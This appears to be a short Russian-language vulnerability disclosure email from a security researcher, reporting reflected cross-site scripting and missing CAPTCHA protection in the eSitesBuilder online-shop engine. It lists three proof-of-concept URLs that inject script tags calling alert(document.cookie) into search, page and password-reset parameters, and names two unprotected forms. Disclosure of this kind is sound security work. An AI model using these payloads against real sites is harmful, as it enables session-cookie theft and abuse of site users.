Vulnerabilities in eSitesBuilder

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting and Insufficient
Anti-automation уязвимостях в eSitesBuilder. Данные уязвимости я нашёл в 2007-2008
годах на одном сайте онлайн магазина (а позже некоторые из этих уязвимостей я
выявил и на другом сайте на данном движке). А недавно я выяснил, что данный движок
для онлайн магазинов - это eSitesBuilder.

XSS:

http://site/index.php?page=search&search_text=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/index.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/forget.php?e_mail=%3Cscript%3Ealert(document.cookie)%3C/script%3E&seenform=y

Insufficient Anti-automation:

http://site/register.php

http://site/ru/contacts/index.html

В форме регистрации и форме контактов нет защиты от автоматизированных запросов
(капчи).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4300/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua